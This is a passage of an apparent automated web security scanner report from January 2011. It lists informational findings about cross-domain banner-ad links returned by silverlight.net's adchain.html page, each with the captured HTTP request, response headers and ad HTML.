<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=465&CampaignID=1858&AdvertiserID=9&BannerID=2574&SiteID=2&RandomNumber=888561024&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/300x250-WP7.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.456. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=510&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=1705651638&Keywords=
http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:12 GMT
Content-Length: 392

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=510&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=1705651638&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.457. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1489354989&Keywords=
http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:15:45 GMT
Content-Length: 381

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1489354989&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.458. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1776744983&Keywords=
http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:14:48 GMT
Content-Length: 381

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1776744983&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.459. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=478&AdvertiserID=72&BannerID=350&SiteID=6&RandomNumber=1156413973&Keywords=
http://ads.neudesicmediagroup.com/ads/2%20728-90-16.png

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:12 GMT
Content-Length: 379

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=478&AdvertiserID=72&BannerID=350&SiteID=6&RandomNumber=1156413973&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2%20728-90-16.png" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.460. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=401&CampaignID=1855&AdvertiserID=129&BannerID=2492&SiteID=2&RandomNumber=1760560210&Keywords=
http://ads.asp.net/ads/W_DevSum11-bann_728x90.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:08 GMT
Content-Length: 362

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=401&CampaignID=1855&AdvertiserID=129&BannerID=2492&SiteID=2&RandomNumber=1760560210&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/W_DevSum11-bann_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.461. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=136391486&Keywords=
http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:32:48 GMT
Content-Length: 380

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=136391486&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.462. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=369&SiteID=6&RandomNumber=444363425&Keywords=
http://ads.neudesicmediagroup.com/ads/flexreports_1110_728x90.gif

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:37 GMT
Content-Length: 388

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=369&SiteID=6&RandomNumber=444363425&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/flexreports_1110_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.463. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=537257586&Keywords=
http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:19 GMT
Content-Length: 380

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=537257586&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.464. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1194057922&Keywords=
http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:43 GMT
Content-Length: 381

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1194057922&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.465. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=457&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=1024933072&Keywords=
http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Content-Length: 380

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=457&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=1024933072&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.466. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=38&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=38&CampaignID=1848&AdvertiserID=12&BannerID=2631&SiteID=2&RandomNumber=1351504933&Keywords=
http://ads.asp.net/ads/wijmo_charts_300x250.png

Request

GET /adchain.html?ZoneID=38&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:37 GMT
Content-Length: 359

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=38&CampaignID=1848&AdvertiserID=12&BannerID=2631&SiteID=2&RandomNumber=1351504933&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/wijmo_charts_300x250.png" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.467. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=510&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=2100389386&Keywords=
http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/devices/windows-phone/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:26 GMT
Content-Length: 392

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=510&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=2100389386&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.468. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=244575900&Keywords=
http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:10:59 GMT
Content-Length: 380

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=244575900&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.469. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=39&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=39&CampaignID=1898&AdvertiserID=124&BannerID=2613&SiteID=2&RandomNumber=193469040&Keywords=
http://ads.asp.net/ads/1_LDN.videos.131.sil.gif

Request

GET /adchain.html?ZoneID=39&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/learn/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/devices/windows-phone/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/learn/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:30 GMT
Content-Length: 359

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=39&CampaignID=1898&AdvertiserID=124&BannerID=2613&SiteID=2&RandomNumber=193469040&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/1_LDN.videos.131.sil.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.470. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=494&AdvertiserID=68&BannerID=431&SiteID=6&RandomNumber=1201623385&Keywords=
http://ads.neudesicmediagroup.com/ads/WebUI_728x90.jpg

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:20 GMT
Content-Length: 378

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=494&AdvertiserID=68&BannerID=431&SiteID=6&RandomNumber=1201623385&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/WebUI_728x90.jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.471. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=457&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=1341442495&Keywords=
http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:45:05 GMT
Content-Length: 380

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=457&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=1341442495&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.472. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1951762302&Keywords=
http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
